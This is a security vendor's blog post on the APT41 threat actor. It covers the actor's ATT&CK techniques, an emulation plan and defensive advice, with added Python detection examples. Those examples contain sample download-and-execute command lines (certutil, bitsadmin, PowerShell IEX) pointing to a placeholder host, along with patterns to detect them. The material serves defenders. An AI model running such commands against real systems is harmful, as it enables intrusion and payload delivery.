Welcome to another week of #ThreatThursday. This week we leverage an adversary emulation plan created and shared with the community by a third party: APT41 Emulation Plan. As usual, we will cover Cyber Threat Intelligence, create a threat actor profile, create an adversary emulation plan from the work done by Huy, share the plan on our GitHub, explain some of the new TTPs we will leverage, and discuss how to defend against APT41. We hope you enjoy.

    Cyber Threat Intelligence

    APT41 is a Chinese actor first seen active in 2012 and observed in broad-ranging campaigns through 2020. Its intent has been both state-sponsored espionage and financial gain. After exploitation, APT41 leverages sophisticated TTPs and deploys additional payloads through multiple different methods, such as bitsadmin and certutil. It also looks to evade defenses and establish persistence, making it an incredibly dangerous adversary.

    Cyber Threat Intelligence Sources: 

    Many of these TTPs have been discussed in previous #ThreatThursdays, so we want to focus on some new ones. In the adversary emulation section we will discuss:

    • Execution Guardrails - restricting the payload to only execute within a particular domain environment
    • Bitsadmin - to download a payload
    • Certutil - to download a payload
    • PowerView.ps1 - PowerShell script to gain situational awareness on a domain

    Adversary Emulation Plan

    After reviewing the Cyber Threat Intelligence reports and MITRE ATT&CK mapping, we organized the TTPs by Tactic and created a threat profile for APT41:

    Initial Access

    T1190 - Exploit Public-Facing Application

    T1566 - Phishing

    T1566.001 - Spearphishing Attachment

    T1195 - Supply Chain Compromise

    T1195.002 - Compromise Software Supply Chain

    Command and Control

    T1071 - Application Layer Protocol

    T1071.004 - DNS

    T1071.002 - File Transfer Protocols

    T1071.001 - Web Protocols

    T1568 - Dynamic Resolution

    T1568.002 - Domain Generation Algorithms

    T1008 - Fallback Channels

    T1105 - Ingress Tool Transfer

    T1104 - Multi-Stage Channels

    T1090 - Proxy

    T1102 - Web Service

    T1102.001 - Dead Drop Resolver

    Collection

    T1560 - Archive Collected Data

    T1560.001 - Archive via Utility

    T1056 - Input Capture

    T1056.001 - Keylogging

    Execution

    T1059 - Command and Scripting Interpreter

    T1059.001 - PowerShell

    T1059.003 - Windows Command Shell

    T1059.004 - Unix Shell

    T1203 - Exploitation for Client Execution

    T1053 - Scheduled Task/Job

    T1053.005 - Scheduled Task

    T1569 - System Services

    T1569.002 - Service Execution

    T1047 - Windows Management Instrumentation

    Defense Evasion

    T1197 - BITS Jobs

    T1480 - Execution Guardrails

    T1480.001 - Environmental Keying

    T1070 - Indicator Removal on Host

    T1070.001 - Clear Windows Event Logs

    T1070.003 - Clear Command History

    T1070.004 - File Deletion

    T1036 - Masquerading

    T1036.005 - Match Legitimate Name or Location

    T1112 - Modify Registry

    T1027 - Obfuscated Files or Information

    T1542 - Pre-OS Boot

    T1055 - Process Injection

    T1014 - Rootkit

    T1218 - Signed Binary Proxy Execution

    T1218.001 - Compiled HTML File

    T1553 - Subvert Trust Controls

    T1553.002 - Code Signing

    T1078 - Valid Accounts

    Credential Access

    T1110 - Brute Force

    T1110.002 - Password Cracking

    T1003 - OS Credential Dumping

    T1003.001 - LSASS Memory

    Persistence

    T1547 - Boot or Logon Autostart Execution

    T1547.001 - Registry Run Keys / Startup Folder

    T1136 - Create Account

    T1136.001 - Local Account

    T1543 - Create or Modify System Process

    T1543.003 - Windows Service

    T1133 - External Remote Services

    T1574 - Hijack Execution Flow

    T1574.002 - DLL Side-Loading

    T1542.003 - Bootkit

    Discovery

    T1083 - File and Directory Discovery

    T1046 - Network Service Scanning

    T1135 - Network Share Discovery

    T1016 - System Network Configuration Discovery

    T1049 - System Network Connections Discovery

    T1033 - System Owner/User Discovery

    Privilege Escalation

    T1546 - Event Triggered Execution

    T1546.008 - Accessibility Features

    Lateral Movement

    T1021 - Remote Services

    T1021.001 - Remote Desktop Protocol

    Impact

    T1486 - Data Encrypted for Impact

    T1496 - Resource Hijacking

    As usual, we created and shared the APT41 adversary emulation plan on our GitHub in both ATT&CK Navigator JSON and SCYTHE Threat JSON. In this emulation plan, we broke down the threat into different steps: discovery, execution, defense evasion, persistence, credential access, and clean up. We also added threat automation language to check if the payload is running with high integrity (administrative privilege). If it is running with privilege, it takes additional steps that it skips when running without privilege.

    APT41 leverages the well-known PowerShell script for host, network, and domain situational awareness (also known as reconnaissance or discovery) called PowerView.ps1. There are multiple ways to download and execute this script in memory, but in this case we are going to download the script to disk and then call the script to run various cmdlets it provides:

    Defense Evasion with bitsadmin and certutil

    APT41 uses two well-known living off the land binaries and scripts (LOLBAS). These are binaries signed by Microsoft that come with the operating system and have some added functionality. In the adversary emulation plan, we use bitsadmin and certutil to download two well-known PowerShell scripts for Kerberoasting and domain enumeration.

    To maintain our non-destructive philosophy of emulation, we showed the ability to download example payloads and execute PowerShell commands without necessarily running anything malicious. To show a proof of concept for persistence, we chose to add example registry keys, services, and tasks so that they would be easily distinguishable and removable.

    All of the above steps for persistence may be done by a user with limited privileges. We have added a check to the adversary emulation plan to determine the integrity of the process; if it is a high integrity process, the plan then performs other persistence and credential access TTPs that require administrative privileges:

    After all the automation for APT41 is run, there are cleanup steps to remove the proof of concept persistence methods created by earlier actions.

    Defend against APT41

    While APT41 has quite the span of discovery, persistence, and evasion techniques, it also has a few specific key areas that can inform a security team on how to defend against it. 

    Additional Payload Download

    APT41 has a few methods of downloading additional payloads: powershell, certutil, and bitsadmin. These are known as living off the land binaries and scripts. These are binaries signed by Microsoft that come with the operating system. Preventing their execution is very difficult so it is best to enable detection and alerting controls when they are used to access external resources.
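    One way to turn the advice above into a detection, as an added example that is not part of the original post or the SCYTHE plan: the records below are constructed in the shape of Sysmon Event ID 1 (process creation) telemetry, and the rule fires only when a download-capable LOLBin is given both a download switch and an external URL, so routine certutil and bitsadmin administration does not alert.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1 /
# EDR telemetry (Image, CommandLine, User). Sample input, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f https://example.invalid/PowerView.ps1 C:\Users\Public\pv.ps1",
     "User": "CORP\\jdoe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job1 /download /priority normal https://example.invalid/SharpHound.ps1 C:\Users\Public\sh.ps1",
     "User": "CORP\\jdoe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1')",
     "User": "CORP\\jdoe"},
    # Benign uses of the same binaries: no download switch, no URL.
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -verify C:\temp\cert.cer",
     "User": "CORP\\jdoe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /list /allusers",
     "User": "NT AUTHORITY\\SYSTEM"},
]

URL = re.compile(r"https?://\S+", re.IGNORECASE)

# Per-binary switches that indicate the LOLBin is fetching content rather
# than doing its routine administrative job.
DOWNLOAD_INDICATORS = {
    "certutil.exe": re.compile(r"-urlcache", re.IGNORECASE),
    "bitsadmin.exe": re.compile(r"/transfer|/addfile", re.IGNORECASE),
    "powershell.exe": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer",
        re.IGNORECASE),
}


def detect_lolbin_downloads(events):
    """Return one finding per event where a download-capable LOLBin is
    invoked with a download switch together with an external URL."""
    findings = []
    for ev in events:
        binary = ev["Image"].rsplit("\\", 1)[-1].lower()
        pattern = DOWNLOAD_INDICATORS.get(binary)
        if pattern is None:
            continue
        cmd = ev["CommandLine"]
        url = URL.search(cmd)
        if pattern.search(cmd) and url:
            findings.append({"binary": binary, "user": ev["User"],
                             "url": url.group(0).rstrip("')")})
    return findings
```

    Feeding the same rule the parent process (for example an Office application spawning certutil) would narrow it further; the sample above keys on the command line alone.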

    Public PowerShell Scripts

    APT41 has been observed to use various publicly available PowerShell scripts by downloading them onto the endpoint and then executing them. In this adversary emulation plan we download the following to disk:

    • PowerView.ps1
    • WmiExec.ps1
    • ASREPRoast.ps1
    • SharpHound.ps1

    In this case we did not modify the scripts, so creating detection for the exact scripts known to be used by malicious actors may be an easy and effective way to detect this activity. There are many ways around it, but this detection is a start.


    An alarming method APT41 uses to establish persistence on a victim is creating a user. Defending against this would require a group policy that disallows users from creating another user. Another method of persistence that is even more specific to APT41 is creating a service called “StorSyncSvc”. Detecting this service creation immediately (if the malware had somehow elevated privileges) would help defend against it.
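    The two persistence behaviors above map to Windows events that are already logged on every host: Security Event ID 4720 (a user account was created) and System Event ID 7045 (a service was installed). The following is an added example, not code from the original post or the SCYTHE plan, that runs a small rule set over constructed event records; the provisioning allow-list and the user-writable path prefixes are assumptions for illustration.

```python
from collections import namedtuple

Event = namedtuple("Event", "log event_id fields")

# Constructed Windows event records (not real telemetry):
# Security 4720 = "A user account was created", System 7045 = "A service was installed".
SAMPLE_EVENTS = [
    Event("Security", 4720, {"SubjectUserName": "jdoe", "TargetUserName": "support01", "Computer": "WS01"}),
    Event("System", 7045, {"ServiceName": "StorSyncSvc", "ImagePath": r"C:\Users\Public\sync.exe", "Computer": "WS01"}),
    Event("System", 7045, {"ServiceName": "Sense",
                           "ImagePath": r"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe",
                           "Computer": "WS01"}),
    # Expected provisioning activity on the domain controller, should not alert.
    Event("Security", 4720, {"SubjectUserName": "helpdesk-svc", "TargetUserName": "newhire", "Computer": "DC01"}),
]

# Accounts expected to create users (assumed allow-list; populate from your own environment).
PROVISIONING_ACCOUNTS = {"helpdesk-svc"}
# Service name reported for APT41 persistence in the post above.
SUSPICIOUS_SERVICE_NAMES = {"storsyncsvc"}
# Locations a legitimate service binary should not run from (assumed list).
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def detect_persistence(events):
    """Return (technique, host, description) tuples for suspicious account
    creation (T1136.001) and service installation (T1543.003)."""
    alerts = []
    for ev in events:
        f = ev.fields
        if ev.log == "Security" and ev.event_id == 4720:
            if f["SubjectUserName"].lower() not in PROVISIONING_ACCOUNTS:
                alerts.append(("T1136.001", f["Computer"],
                               f"{f['SubjectUserName']} created account {f['TargetUserName']}"))
        elif ev.log == "System" and ev.event_id == 7045:
            name = f["ServiceName"].lower()
            path = f["ImagePath"].lower()
            if name in SUSPICIOUS_SERVICE_NAMES or path.startswith(USER_WRITABLE_PREFIXES):
                alerts.append(("T1543.003", f["Computer"],
                               f"service {f['ServiceName']} installed from {f['ImagePath']}"))
    return alerts
```

    The service rule alerts on the known name and, more generally, on any service whose binary lives in a user-writable directory, which also catches a renamed copy of the same persistence.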


    While APT41 is quite the sophisticated actor, we can still ingest the Cyber Threat Intelligence, map it to MITRE ATT&CK, and create an adversary emulation plan that covers much of the behavior of the threat. More importantly, this emulation can aid in developing methods of preventing and detecting this threat through its specific and unique behaviors. We hope you enjoyed this edition of #ThreatThursday.

    This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.

    About SCYTHE

    SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors. For more information email info@scythe.io, visit https://scythe.io, or follow on Twitter @scythe_io.

    Post by Sean
    October 15, 2020